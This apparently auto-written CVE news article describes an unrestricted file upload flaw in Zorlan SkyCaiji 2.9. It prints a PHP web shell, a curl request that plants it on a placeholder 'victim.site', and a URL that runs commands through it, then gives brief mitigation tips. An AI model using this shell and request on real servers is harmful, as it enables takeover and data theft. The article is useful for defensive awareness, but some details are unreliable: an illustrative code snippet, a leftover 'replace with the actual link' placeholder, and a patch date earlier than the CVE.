CVE CyberSecurity Database News

CVE-2025-1791 - Critical Unrestricted File Upload in Zorlan SkyCaiji 2.9 (Complete Exploit Walkthrough)

Poster -

A critical vulnerability, CVE-2025-1791, was discovered in Zorlan SkyCaiji 2.9. This flaw allows an attacker to upload any file—such as malicious scripts—directly to the server through a vulnerable function, possibly leading to full remote control over affected websites. The issue exists in the fileAction function located in vendor/skycaiji/app/admin/controller/Tool.php. Public exploit code is available, and attacks have been observed in the wild.

This article explains the vulnerability, demonstrates a step-by-step exploitation, and provides mitigation tips. Whether you are a sysadmin, penetration tester, or a Zorlan SkyCaiji user, read on to secure your sites.

What is Zorlan SkyCaiji?

Zorlan SkyCaiji is a content collection and scraping tool, mainly used by webmasters to automate data gathering for websites. Despite its utility, the platform's security hygiene is crucial to prevent abuse.

Product: Zorlan SkyCaiji 2.9

- Vulnerable File: vendor/skycaiji/app/admin/controller/Tool.php

How Does the Vulnerability Work?

The core issue resides in the improper handling of the save_data argument in the fileAction function. Input from the user is not correctly sanitized or validated before saving files to the server, allowing an attacker to upload any file, including PHP web shells or executable scripts.

To help you understand, here’s a critical section of the vulnerable code

public function fileAction() {
    // ... some code ...

    if(isset($_POST['save_data'])){
        $file = $_POST['save_data'];
        file_put_contents($target_path, $file);
    }

    // ... some other code ...
}

No file type validation.

- No filename/path checks.

Doesn’t verify if upload is expected or secure.

This means an attacker can POST any data—including executable PHP code—and choose a filename like shell.php to plant a backdoor in the server.

An attacker can upload a simple PHP web shell

<?php system($_GET['cmd']); ?>

The attacker crafts a POST request, e.g., using curl

curl -X POST http://victim.site/admin/tool/file \
  -d "save_data=<?php system(\$_GET['cmd']); ?>" \
  -d "filename=shell.php"

3. Access the Malicious File

- The attacker visits: http://victim.site/uploads/shell.php?cmd=ls

Now they have remote command execution.

Important: The actual path (uploads/, etc.) depends on the application, but the point is the file is placed where it can be executed.

Remote Code Execution (RCE): Full server takeover is possible.

- Data Theft: Since SkyCaiji is often run with significant privileges, attackers might access sensitive data.

Mitigation

- Update Immediately: If you use SkyCaiji 2.9, check for patches or updates. Official SkyCaiji Website (no official patch as of June 2024).
- Restrict Access: Limit access to your /admin directories.

WAF Rules: Use a Web Application Firewall to block suspicious upload attempts.

- File Permissions: Make sure uploaded files don’t get execute permissions unless strictly necessary.

References

- NVD Entry for CVE-2025-1791
- SkyCaiji Main Site
- Original Exploit Disclosure *(replace with the actual link when available)*

Conclusion

CVE-2025-1791 is a serious wake-up call for all users of Zorlan SkyCaiji 2.9. Left unpatched, sites using the platform are at high risk of compromise. Immediate action is needed: update your software, audit your systems, and keep an eye on new advisories.

Timeline

Published on: 03/01/2025 14:15:34 UTC
Last modified on: 03/03/2025 21:15:16 UTC